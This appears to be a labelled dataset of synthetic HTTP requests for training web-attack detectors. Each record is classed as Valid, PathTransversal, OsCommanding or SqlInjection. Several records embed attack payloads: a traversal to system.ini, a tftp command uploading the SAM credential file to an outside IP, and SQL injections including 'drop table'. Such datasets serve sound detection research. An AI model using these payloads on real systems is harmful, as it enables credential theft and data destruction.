Accept-Language: tshcli-umte, aetnds-emgeOm;q=0.0, no7-32ed, ds4-anit, mleie-ru;q=0.0
Cache-Control: no-store
Client-ip: 234.131.254.239
Cookie: DOUfE1v=oitce;keYMntnrtraf=LJtkoadminIindo;ZVn@K5_0.=se
Cookie2: $Version="67"
Date: Sat, 05 May 07 05:41:39 UTC
ETag: "YiQ@0NMwQ2OIQMTOOMbh"
Expect: gwsl=lee0l;ngaecoee
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Thu, 20 Nov 08 03:56:32 GMT
If-Unmodified-Since: Wed, 22 Jun 05 01:49:14 UTC
If-Match: *
If-None-Match: "4@_i-hVBWkkinfyOQhgW"
If-Range: *
Max-Forwards: 351
MIME-Version: 1.7
Pragma: 5b=muTns
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Ntiork yesrssnr=smegluuc
Range: 41676-
Referer: /wste/8nbS9o/tphgve/ajkam.css
TE: deflate;q=0.9
Trailer: Authorization
User-Agent: fndt1D/4.3.5.3.9
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/1.4 49.139.180.106, HTTP/9.1 www.ltZsi.gif, 6.4 www.ftnx.js
Transfer-Encoding: gzip
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44603
Start - Id: 19621
class: Valid
GET /bL_90E_R7_jRT/6WgtboACesV8V1WE1jAB/ic0hH5s11axwupinna/q_@LmstyleO35a6aew/iG06Vl/iymeecirliunejkeyt/ijsdmjtrnzt/tkeXWIM/tgduI5cpne6lEdhddHe/dZwNTut.php3?erc=fcopyuryjacxp_&teptaerp5=rntre9ytiR9ui&tgxse=6430405&UlSb8adminyhBbo6=ydoe&evyezai8=Etyw&kmilissxe=265389628 HTTP/1.1
Host: 96.143.140.86
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: saAto-ou, e-59;q=0.5
Cache-Control: osnri3i=apsth
Client-ip: 146.158.107.168
Cookie: ffeasttra=g;ui=08240;vIraBVYc7=a5FUe3CvpbjH;etn0hs=ossytyoluo8cliCod;hhrr=mo
Cookie2: $Version="32"
Date: Thu, 13 Aug 09 18:33:46 UTC
ETag: "gwWlvqw-Hsu3xuRd"
Expect: 100-continue
From: arin@CIbt.st
If-Modified-Since: Fri, 12 Mar 04 21:31:43 UTC
If-Unmodified-Since: Sat, 05 Mar 05 14:22:46 GMT
If-Match: "@CiAv5rRH_HHWx8Ng42"
If-None-Match: "cBlnaKJleGDPofZP-cJ"
If-Range: *
Max-Forwards: 17
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: NTLM TnNIZ3J0ZWthb0VUMnQ0bmJzaGtubmFvTm02Tm5TZWM4bzhlRXNwY3Rkbw==
Range: 58755-,37479-07
Referer: /ueyh/iiO0pr.pdf
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/1.6 (Windows; U; Windows NT 6.9; ie-tm; rv:9.4.9) Gecko/92535705
UA-CPU: x86
UA-Disp: 1867,055,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2031x847
Via: erq/3.2 129.249.57.251, mqEY/1.7 www.ebay.tiff
Transfer-Encoding: hesfS; EdvntisN=luhnat
Upgrade: emf/6.5
Warning: 871 www.cnhAnst.jpg "iceNks8t" 
X-Forwarded-For: 165.100.124.216
X-Serial-Number: 84453733272881684848
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19621
Start - Id: 45937
class: PathTransversal
GET /7a@pWyJNCUY8H/eS.h-3n/agL/otMuMn/IdivWdgHYechod4QKodeleteY/ptpit/hOwP_KHx3EyqXB8-EGmR/NtnersaioOot5dseto/q8YUlb3PIlkd3T/Ls5yaiTn.mdb?owis2df=qdHravdctnHun&regtioe=2031&2dostesBejOdezS=515&idiouhner=iivtae34tpeucess&iasierhrtseDpie=yrr&uOoPrcpWZT=+%3ERG%2Bio&Hrn4adstdow=ueconnectapasswdt&uaae6dupgl=3019582738&DjsTac=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: www.rthomgxmm.gov
Connection: close
Accept: image/*, text/html;q=0.4, video/*;q=0.3
Accept-Charset: hz-gb-2312;q=0.2
Accept-Encoding: deflate;q=0.0, gzip;q=0.5, deflate;q=0.5, identity
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 97.149.89.41
Cookie: autoexec4-LjxkMg=1@u59g5;atp0csbsitoc=l-RB@Od;ea=ufCecoqus3anze;Ti=97;o0oes=0;ft.ftp4U0az5=3120523
Cookie2: $Version="3"
Date: Sun, 23 May 04 02:54:28 GMT
ETag: W/"ur2DNWLm99fcidgU4"
Expect: exbam=LrtehsF
From: ba5dren@nteitjeEal.cz
If-Modified-Since: Sat, 08 Jan 05 12:21:44 CET
If-Unmodified-Since: Thu, 01 Apr 04 04:52:07 UTC
If-Match: "fm23g2-AwpNTYH5D04"
If-None-Match: "sAOteTtLYV3R0.hp1g"
If-Range: Sun, 28 Dec 08 01:00:32 UTC
Max-Forwards: 7656
MIME-Version: 2.6
Pragma: oahN7ly=f
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: /1uye/ogati/eocmyR/uzre.msf
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/8.0 (X11; U; Solaris 5.9; as-nt; rv:6.7.1) Gecko/61427101
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: HTTP/1.3 174.175.247.217, 7.9 www.vVPeiaE.tiff, ezqew/1.1 www.f8fbaind.shtml:33
Transfer-Encoding: telre
Upgrade: nstsgn/3.1
Warning: 301 www.foehiLHu.gif "dqnsc" 
X-Serial-Number: 15666151508879935432
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45937
Start - Id: 22249
class: Valid
GET /era1eb6tT8u/ttoLeynd4pfooast/tveoep1slhp7iElwFM/hWQ/vXvypzOtwindow.openw/rosubm2/jkJTgroup byG8PT6w/yz/eboCwFRvupdzXX_.mspx? HTTP/1.0
Host: 22.60.200.150
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: a-bfasi, qb-ktr51;q=0.7
Cache-Control: max-stale
Client-ip: 81.203.54.190
Cookie: 4kmCD=afe(ah NhrtoS;ahrcyylE4oa5=Aswybeae;LrasIdise= soi;bs7rwsdtjhmuy3o=aoXRnrU.
Cookie2: $Version="59"
Date: Sun, 05 Feb 06 20:31:35 CET
ETag: W/"8rDlKlxFywn4a_UjV6P0"
Expect: ljhEdvL
From: orEtts@ismhaeter.de
If-Modified-Since: Sun, 31 May 09 04:49:31 GMT
If-Unmodified-Since: Wed, 18 Nov 09 22:13:21 GMT
If-Match: "pSpZeEZ1PcuO3wO.v2T"
If-None-Match: *
If-Range: "t1oHWKHsTq1CWfQK"
Max-Forwards: 527
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: ngoFt8 taaec=t7nymEoi
Authorization: Digest opaque="oWtn"
Range: 00-
Referer: http://www.ndxe.biz/rneanwD5/tStli6.msf
TE: trailers
Trailer: TE
User-Agent: haao91enaL
UA-CPU: MIPS
UA-Disp: 204,827,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 196x167
Via: 7.6 www.ists.htm
Transfer-Encoding: compress
Upgrade: nenb/7.3
Warning: 625 www.bcOiE.htm:75 "aNlih4dh3" "Fri, 31 Mar 06 08:32:01 UTC"
X-Forwarded-For: 83.236.39.135
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22249
Start - Id: 44582
class: OsCommanding
GET /bPTaDbflMEBwH/piPzuAJPK3lyt/13279m/aaeeiil6ahnrl.jpeg?teeoYwgb=4469124&liiBt=571&3rrrrkr=lt&taqerrecchlow=254.119.68.114+++++%7C++tftp++++-i+++++30.90.208.226++++PUT+sam._&melny0nlts6=89402&7mSeemn1eas9eh=8tI%3Ef&vs=hhpeogc&yRgFl=h0mX2bB80&bDPHPVE@S9=84&wiUslnezsriou=ibX.bVCi&tcn=aegwtioWreplacerps%3BeTt HTTP/1.0
Host: www.slaeIn34t.org:80
Connection: thop
Accept: */*
Accept-Charset: x-mac-chinesetrad, cp-936, iso-8859-7;q=0.1, big5;q=0.4, iso-8859-1;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=3
Client-ip: 2.90.133.61
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="82"
Date: Mon, 03 Jul 06 14:07:54 GMT
ETag: W/"wGdDKS5AiuXyrtwMN2s"
Expect: 100-continue
From: 5adpe@rmshynj.net
If-Modified-Since: Fri, 30 May 08 20:37:23 UTC
If-Unmodified-Since: Wed, 23 Apr 08 17:01:04 UTC
If-Match: "QytJcDmlsTYW0IRtI"
If-None-Match: "nRmw-XK277S1QYYnS5b"
If-Range: "-x@gyRuBYqkDCwoP"
Max-Forwards: 53
MIME-Version: 0.9
Pragma: tcTa='pvqn5p'
Proxy-Authorization: Basic YXNkdUdTOnVzZTcz
Authorization: NTLM a2J1cmgzMWhpZW9ubm55aGlCZ2xuZWluanJzQm9zZW5SYXNpYWlwNWVMczBu
Range: 746-,-10102
Referer: http://iimnha4a.de/s9oguf2e/q54oru/Rahu3e.swf
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 8.4; ew-sc; rv:5.7.7) Gecko/53325164
UA-Color: color32
Via: 3.3 119.37.252.201, HTTP/8.9 www.o8ds.png
Transfer-Encoding: deflate
Upgrade: stnat6/0.0
Warning: 371 www.earne.js "emyhnaonh" 
X-Forwarded-For: 84.212.52.145
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44582
Start - Id: 35361
class: SqlInjection
GET /gPnCrRllH/eikoLDv/l6pc49thrh/mtZhwi3yd5TYiQN/JPbgsound_/dhXxKNPnu/yF/yclaelapoteyudemlh/r6Bfvf3OvyNzewg77xpY/nltdlaef9fownrhaezGc.php4?Tao2=34&35enrstaEtozet=rk&euirsIaIhpy7mg=0591828&sM1staUnewheh=oT8f3TI&draieme7nev=avrii&Anlmtx=40&N6Esock_streamTmNLBk=httpsmb%24et1iora&aou=%27%3B+++drop+++table+++tt7gih HTTP/1.0
Host: 145.46.124.209
Connection: tpaep
Accept: video/quicktime
Accept-Charset: x-mac-arabic;q=0.3, cp-950;q=0.7, hz-gb-2312;q=0.9, iso-8859-9;q=0.3, windows-1252
Accept-Encoding: *;q=0.8
Accept-Language: attae-txqTnrtl, nhteco-ew1ew, cEzpeWee-asinansE, Nt-mb
Cache-Control: max-stale
Client-ip: 254.147.83.204
Cookie: 4ateradd3=nulloc
Cookie2: $Version="02"
Date: Wed, 02 Aug 06 02:56:02 UTC
ETag: W/"7KzDRrOZR0LNGoB"
Expect: 100-continue
From: ualuoer@tmohteyrt.be
If-Modified-Since: Tue, 11 Jul 06 04:36:43 GMT
If-Unmodified-Since: Thu, 13 Jan 05 20:58:48 CET
If-Match: *
If-None-Match: "ueeJa0Dl8Tb3UVx"
If-Range: Fri, 12 Jun 09 07:01:46 CET
Max-Forwards: 97
MIME-Version: 6.8
Pragma: ot0piek='Drye'
Proxy-Authorization: NTLM VGVkNHBpZjUzc3l6dm5wZ3RtdG5kb2FoM2RuZW5vdTJhc3Rvb2ZycHNoc2g=
Authorization: tatos 8nlSpeje=8eoUwrs
Range: 56564-256483,76-,27160-85
Referer: http://rnct.be/ws40n/eaFQod/twoebl/aluiotop/okTsp.tiff
TE: trailers
Trailer: Host
User-Agent: aEFederh/5.4
UA-CPU: 68000
UA-Disp: 149,920,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 739x825
Via: 1.0 www.aOo5t6.html, 4.1 www.nNIenmt.jpeg
Transfer-Encoding: gzip
Upgrade: gerh/9.6
Warning: 445 236.92.54.164 "ihposkezh6eanidatou6" "Sun, 23 Apr 06 11:05:08 UTC"
X-Forwarded-For: 129.227.252.231
X-Serial-Number: 06713
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35361
Start - Id: 42150
class: SqlInjection
GET /7fPNEsXf@M_DwqDIg/rma/ne.htm?N3gHpsKBY.UXO=8846&EW49=%27+OR+++%278pteoiTOtie%27+%3E+++%27S&enctt=window.openniaH HTTP/1.0
Host: 211.74.123.253
Connection: keep-alive
Accept: text/html;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nn-imOoe;q=0.1, ieac-hnd, oeEok6r-0c;q=0.9, e2-o, otilyoe-nom4dco;q=0.1
Cache-Control: no-store
Client-ip: 117.221.83.105
Cookie: eecirujoAdtfle=a
Cookie2: $Version="903"
Date: Wed, 25 Aug 04 23:06:50 CET
ETag: W/"R.zF5Up0kwBtPzZ-DN7V"
Expect: 2tic
From: yaieolw@dAieet.st
If-Modified-Since: Sun, 29 Jun 08 05:21:08 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5572
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: /Hszlidcb.php4
TE: deflate,trailers
Trailer: Authorization
User-Agent: oon1tta/7.0.8.2.2
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3499x504
Via: 4.5 www.homphXe.html, HTTP/5.2 www.oanEato.htm:7
Transfer-Encoding: gzip
Upgrade: 9lrrsw/6.5, henvno/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42150
Start - Id: 11321
class: Valid
GET /yOIrwdeodhr/nhsedwwedofcttou3/dsBA.@qj0B_gDYsl8B/cglXGa.nsf? HTTP/1.1
Host: 190.171.148.17
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: e-r, aA7ahN-ci;q=0.0, it-nNget;q=0.8
Cache-Control: no-cache
Client-ip: 205.97.76.207
Cookie: 96nk2=th 1&aWt d1xmles[inm;f5lhueueoh=c;2th=$so
Cookie2: $Version="77"
Date: Fri, 04 Aug 06 01:43:02 CET
ETag: "Ecv8ajRCP5OFkTLKb"
Expect: 100-continue
From: 4uewao@tP0n0beotn.fr
If-Modified-Since: Sun, 07 Jan 07 06:19:03 GMT
If-Unmodified-Since: Mon, 03 Dec 07 05:40:40 UTC
If-Match: *
If-None-Match: "hewFx8CnypgDMw8vR"
If-Range: Tue, 06 Jan 09 04:40:10 GMT
Max-Forwards: 7266
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM bWsxZWRobG9iZTlvc3J0aWxhZG1pOEFyZWlpc3Nvb2Vsb2NKZnVucm5ua3U=
Authorization: 2ss3 d2uducrD=8net
Range: 536428-,-28681,5449-8638
Referer: http://www.2m3ra.it/koyin/xnst/Oyna/smnenoH/il7Eqdn.js
TE: gzip;q=0.6
Trailer: Date
User-Agent: eMQANrCsV7 http://www.henyeeEw.de
UA-CPU: Sparc
UA-Disp: 8778,423,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x845
Via: 4.8 235.20.178.147, 4.9 www.odaAand.tiff:64342, HTTP/1.1 117.108.98.116
Transfer-Encoding: deflate
Upgrade: veer/3.0, d8snnM/4.8, nja/8.7, r8o/0.9
Warning: 653 42.106.86.222 "1e9IMojedeurettAw" 
X-Forwarded-For: 203.140.233.72
X-Serial-Number: 7492268797432274
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11321
Start - Id: 32380
class: Valid
GET /e3yLu-2FLzYD/ejA/qyJ.location/iQ1@fbq-e02TstdGaa/iaxizinnh/j6F1k88g/ddwitmihait/aLO3WZFWKl5YwnN.png? HTTP/1.0
Host: www.sirto7h.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: oisonn=8oasRO
Client-ip: 39.45.168.232
Cookie: ce8enait= htacces+a;tenIrteN=ootwge;and88VbqEY=rgninNeokaeageU;Ehl=195043
Cookie2: $Version="300"
Date: Sun, 04 Sep 05 13:27:40 GMT
ETag: "bcP7TEQV0EcuH2331p"
Expect: ajnerm=onntwu;abgnaaoI=itsi
From: itad@eosuny.org
If-Modified-Since: Fri, 25 Jan 08 07:43:38 GMT
If-Unmodified-Since: Sun, 18 Sep 05 18:59:32 GMT
If-Match: *
If-None-Match: *
If-Range: "np8UpBi91a1jqaJO"
Max-Forwards: 858
MIME-Version: 4.2
Pragma: lnp=Lnf
Proxy-Authorization: NTLM ZnQ1NXRsZTZvbW5ocmVjandpZWZhZmV0bXVveUhvcnNscXNnbGxhanIydG10aHhj
Authorization: Digest qop=auth-int
Range: 36-,82952-6516,-8189
Referer: /rs9nunn/u5dmn.mpg
TE: gzip;q=0.7
Trailer: Host
User-Agent: Mozilla/7.5 (Windows; U; Windows NT 9.6; ut-eO; rv:1.4.8) Gecko/98372711
UA-Disp: 0077,169,16
UA-OS: Windows NT
UA-Color: color16
Via: 5.9 www.aTixailr.shtml
Transfer-Encoding: identity
Upgrade: ddG/8.0, tra/2.3
Warning: 283 www.IAam50so.html "n1tieeRszdIlt1mom" 
X-Forwarded-For: 130.13.184.238
X-Serial-Number: 02894265118985687
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32380
Start - Id: 22888
class: Valid
GET /htmfqroy/ikdAnaunXu05U.sb1le/Thlptensestukwhxyf0o/nw51@za6-Boo/nccche6stL9e/vo5aroxeu0o.dll? HTTP/1.1
Host: 25.137.227.38
Connection: close
Accept: image/jpeg;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.1, deflate;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 71.143.142.176
Cookie: uhoahmgSDeuyq=9rsowiiu;weDy06adhtjhi= eser;ssdfs2kEmsetns=cyehstyle;lsiexeccsYeT=cgJYHXynQP.b
Cookie2: $Version="8"
Date: Tue, 16 Aug 05 06:19:05 UTC
ETag: W/"ME6FG0_9uGnLRWBoQDlI"
Expect: 100-continue
From: hsdetaw@dtawa8.gov
If-Modified-Since: Thu, 27 Jul 06 09:21:30 UTC
If-Unmodified-Since: Mon, 09 Jan 06 02:47:21 GMT
If-Match: "V4h95rkLbI2AKF@"
If-None-Match: *
If-Range: Fri, 18 Jul 08 02:31:52 GMT
Max-Forwards: 554
MIME-Version: 2.2
Pragma: 1=a8vo
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM ZE5yckIxVHRvYWVlcmFzb2lJb3NyZHNldGZ3ZWRzYVJ3bFlmOW5pb2xscnQ=
Range: 37032-5753,-977
Referer: http://auaga.org/srasra/BoINrwQe.cfm
TE: chunked,chunked;q=0.2,chunked;q=0.1
Trailer: Trailer
User-Agent: sobrxzee/8.7.4.8.9
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: 4.6 223.87.84.213
Transfer-Encoding: deflate
Upgrade: rhued/7.4
Warning: 186 www.oodtiw.shtml "0e81oio" "Wed, 24 Jun 09 07:13:01 GMT"
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22888
Start - Id: 12473
class: Valid
GET /ik35hg/EeiFE/zgEXneIclMDfj0KR42/yie1iaital/xp_mIL3QWy.php?NohDkey=ox6RCV3qWj.&1sBlbenloese=0320&emireoeatTiicra=hlvar&6iala6ekiOi4tue=5941&eemc=seiwte5&33dupdqm=346 HTTP/1.0
Host: www.9wyfih.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: ot-nsi, 2syaIs-eo19, t-wnhse, qsea-3egsr;q=0.1
Cache-Control: max-stale=44
Client-ip: 71.219.22.11
Cookie: nthepqt6Ynn=o;TixOy=nkdeI65kee5;frenirj=cd4;qomEix=pm()9qlibaamtahrTA ;etar=566
Cookie2: $Version="4"
Date: Wed, 21 May 08 17:15:06 UTC
ETag: W/"ysFV2@WM0CqMD-G"
Expect: eoaA3tio=as6onmf;mi3td5g1=eeT7
From: a0lewqe@txeohoo.be
If-Modified-Since: Sat, 01 Jan 05 20:19:19 CET
If-Unmodified-Since: Wed, 07 Jan 09 05:33:45 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 14 May 07 03:39:21 CET
Max-Forwards: 03
MIME-Version: 2.1
Pragma: sept=o6ows
Proxy-Authorization: Digest qop=ttetoa
Authorization: NTLM d2l0RXRubmdycGZyaHN5c3M5NGZjZW1zdTlscml0dEt0U3R0aGVzcmVkYXNh
Range: 3-331
Referer: http://www.rdeg.de/rakh/leert/gb7ch/Sathssey/ieoK.png
TE: trailers,deflate;q=0.6,trailers
Trailer: Upgrade
User-Agent: sShmrsngo (tyUiBCcKhK)
UA-CPU: StrongARM
UA-Disp: 778,621,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5087x279
Via: HTTP/3.0 www.feinl.jpg
Transfer-Encoding: 4zas
Upgrade: au0l/8.8, 5inEe/6.6, Dsl/5.0, semn/7.4, sa3exa/5.2
Warning: 997 139.90.117.24 "bnqtnmr9rievi" 
X-Forwarded-For: 145.136.143.164
X-Serial-Number: 863262
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12473
Start - Id: 6285
class: Valid
POST /vaoed4afhsurdFEoyg/sn86/ce8iIlxhbs0x/es.pl? HTTP/1.0
Content-Length: 254
Content-Language: oncl3en,k,ice9si
Content-Encoding: deflate
Content-Location: http://uttrmneb.net/Uahccne/3Hissnba/suaEqst.fgf
Content-MD5: bnluTWFyM250bVltdGRmZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 31 Jul 08 07:56:44 UTC
Last-Modified: Sun, 20 Sep 09 08:59:18 UTC
Host: 222.115.85.132:65344
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: compress, gzip
Accept-Language: nci-boel;q=0.0, oielG-eeerdqe;q=0.5
Cache-Control: opbw='onnooaO2'
Client-ip: 85.58.53.162
Cookie: esnN9n=155427734;OfZTshutdown=qWJYeugi;onmtyonl5srn15=3;@W06=eth5wj88n
Cookie2: $Version="5"
Date: Mon, 03 Apr 06 08:09:48 CET
ETag: W/"@c68p_R1HCDtNdj4k0jx"
Expect: 4aeBlD=inoanbD
From: ueos@tseotr.biz
If-Modified-Since: Mon, 07 Apr 08 14:52:39 CET
If-Unmodified-Since: Fri, 30 Apr 04 10:53:53 GMT
If-Match: "wjmU4vwxeQASd@Vm@52u"
If-None-Match: "30xjv4TI_f8hcK02nXX"
If-Range: *
Max-Forwards: 77
MIME-Version: 9.1
Pragma: nr=edz5jghu
Proxy-Authorization: Basic ZGlpcm1uc3Q6eG5zaGxtaA==
Authorization: NTLM VGZJaTQ0cmU2enJ0S2MybHNpbmNnemFhb3RybmhFUmVadW96dXNTMHRlbmhzY3N3
Range: 10-,-849357
Referer: /CuSeeh/l9iamr/Auty/tnetuni/d7phii7i.jpeg
TE: deflate,chunked;q=0.7
Trailer: From
User-Agent: y5nseoshh (rm_a0.; n2P6aI; a@C2DHPv; ellL_bJl-X; e50Khgo16)
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 6564x871
Via: FTP/3.3 www.atamup.js:35
Transfer-Encoding: compress
Upgrade: esochH/3.1, ehsqp/5.4, atmg/1.6, Aulr/8.6
Warning: 097 84.156.203.77 "rilteriyvagst2t" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

j3PRBDEkD=ttruoej6%40&ioszhgsei=ygroup+by%3B+nsloci+lshettmph&vIdeud5v0qnz2fi=%5Cn0&DS7RHCxvbAF=uo&LjBlsHXTnetcat.k=7&istAr2pEnitstl=sE%3Bnaer&5hEaform=rget&hl=+el&0R6e%uzDJconnectecho=002596363&eehaszina9o=wm%5C%7E%25u&jpno=tdB351Yi&utyrimn5xd=mKy-Ch.4o

End - Id: 6285
Start - Id: 6653
class: Valid
PUT /A6kM/i.7C6_sTNeh8QND@/aTYoacUPuFpqq6AE/tdeAox/l9YYW-@iLIysJsJVwY/eg4zplaenrnihad0no/4lfQ-n/oif7soeagups7rdu/egU.pl? HTTP/1.1
Content-Length: 61
Content-Language: r8r7,eoednug
Content-Encoding: compress
Content-Location: http://sinBa.be/5l4aEoa/desdd7i/viee/sisrqN8p.mpg
Content-MD5: MGR0SWR4dVdhY1k1c2VoYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 15:59:05 CET
Last-Modified: Sat, 19 Mar 05 03:07:52 GMT
Host: www.dr6ko.cz
Connection: keep-alive
Accept: image/gif;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: ahaeet-tsrjth;q=0.2, jO-3y;q=0.7
Cache-Control: no-cache
Client-ip: 60.128.81.222
Cookie: 96ocenvaosa7ea=nfjdti;u6cradot0trEtb=gtaaqynahhc
Cookie2: $Version="453"
Date: Thu, 24 Apr 08 06:20:07 CET
ETag: W/"ktL1vlgF4LcWAeaPgFC"
Expect: mesaax0o
From: bdiim@E4ea.org
If-Modified-Since: Wed, 25 Feb 04 09:42:41 CET
If-Unmodified-Since: Wed, 17 Oct 07 18:18:20 GMT
If-Match: *
If-None-Match: "bSvtBb5LWd1ZkPK5b"
If-Range: *
Max-Forwards: 1
MIME-Version: 1.1
Pragma: ogolz='ryceu'
Proxy-Authorization: uehb ymsbater=enutecnm
Authorization: NTLM eW9qYWVxZUxvcnRKdzBjZ3doU29idG5objdxbkVkYTZlMTJjNmJuZWhh
Range: -021340,1293-,80-
Referer: /yeOnnnf.asmx
TE: deflate;q=0.2,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 3.1; 2o-di; rv:2.7.3) Gecko/37905135
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 792x1593
Via: 1zAwdt/4.6 www.0ne7.tiff, HTTP/2.5 119.197.237.60, 8.5 www.hoe80rn.js:34345
Transfer-Encoding: identity
Upgrade: zfoa/4.4, me8e/8.0, eH5/5.3
Warning: 961 www.ts39s.css:813 "fiiw" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

ehrpRtaezgeaxlf=86&ddwaeanarZfrEx=5ftt&nyS=St8oxeweM9ea7Ykfo3

End - Id: 6653
Start - Id: 1652
class: Valid
GET /tbRyneC4iIN8s0CMod9/avZq3zReRVrBLpGaI@tl/hT4Z2e4HaLc/iT9n6m1s/Bx1yQfromt/FzofmYx@C/mahitOsC3llbhls/p7/iKrHwEdY2/met3nnesh/wownsmeodpo.gif?oenbDrdeoterw=mmYunUBf4&hta=ia2&hgtn7o=fVVluaScW&teaon=lteeqei&ntE0DewOiwsiOou=pes9r%3Bwm2dc&bia=7142&a88r=43685731&3mf3ed7e=74491629&29bG_U4copyxtdQ=4742&sbebatSb2ts=4261&ecta8aametado=05 HTTP/1.1
Host: www.rmztdrl.biz
Connection: Urnnwyw
Accept: */*
Accept-Charset: iso-8859-15;q=0.9, x-mac-chinesesimp, x-mac-japanese, koi8
Accept-Encoding: 
Accept-Language: han-sydpde;q=0.4, RatEeef-b7
Cache-Control: max-stale=8
Client-ip: 233.154.243.51
Cookie: hefxsUmcehsfs=84514994
Cookie2: $Version="878"
Date: Mon, 31 May 04 22:55:07 UTC
ETag: "HieeVsLhUdCKW7NLP"
Expect: 100-continue
From: S6tD@nser.com
If-Modified-Since: Thu, 26 Jun 08 23:46:54 CET
If-Unmodified-Since: Sun, 21 Jun 09 02:30:56 UTC
If-Match: *
If-None-Match: "nvxhQ2q3l23iJF9C4"
If-Range: *
Max-Forwards: 966
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest response="bbDfe1acD0cE17D8d4AB2A7cdbb2Df5b"
Authorization: Digest realm
Range: 076818-,251-
Referer: /seoixahm.asp
TE: trailers
Trailer: Trailer
User-Agent: 1clMqtpsa9 (sEpZzw8; npy0EQ1; gnFagwkTd; 5xLuvuB; 7.@3gK6Q0O)
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8230x578
